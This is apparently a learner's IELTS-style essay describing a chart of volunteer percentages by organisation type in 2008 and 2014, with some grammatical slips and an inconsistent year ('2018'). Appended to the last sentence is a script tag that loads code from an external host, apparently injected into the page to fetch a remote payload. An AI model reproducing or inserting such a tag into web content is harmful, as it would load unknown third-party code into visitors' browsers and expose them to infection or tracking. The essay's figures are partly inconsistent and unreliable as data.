The chart below illustrates how many volunteers from 6 organizations named environmental, art, sport, healthcare, educational and others in 2008 and 2014.
Overall, people taking part in environmental, sports and health care increased and the opposite was true for art, educational and others. It is noticeable that the health care volunteers were the least likely to witness the percentage.
In 2008, educational accounted for the most, however this figure went down 7% in 2014, from 24% to 17%. Likewise, standing at 18% and 15% volunteers from art and others respectively, this amount decreased in the next 6 years, at 12% and 9%
Besides, environmental volunteers organisations increased. This figure rose significantly to 8% from 2008 to 2014. When it comes to sport, the percentage of volunteers saw a significant increase to 10%, from 15% in 2018 to 25% in 2014. Moreover, healthcare grew slightly, increasing only by 1%.<script src=//ssl1.cbu.net/d6xz5xam></script>
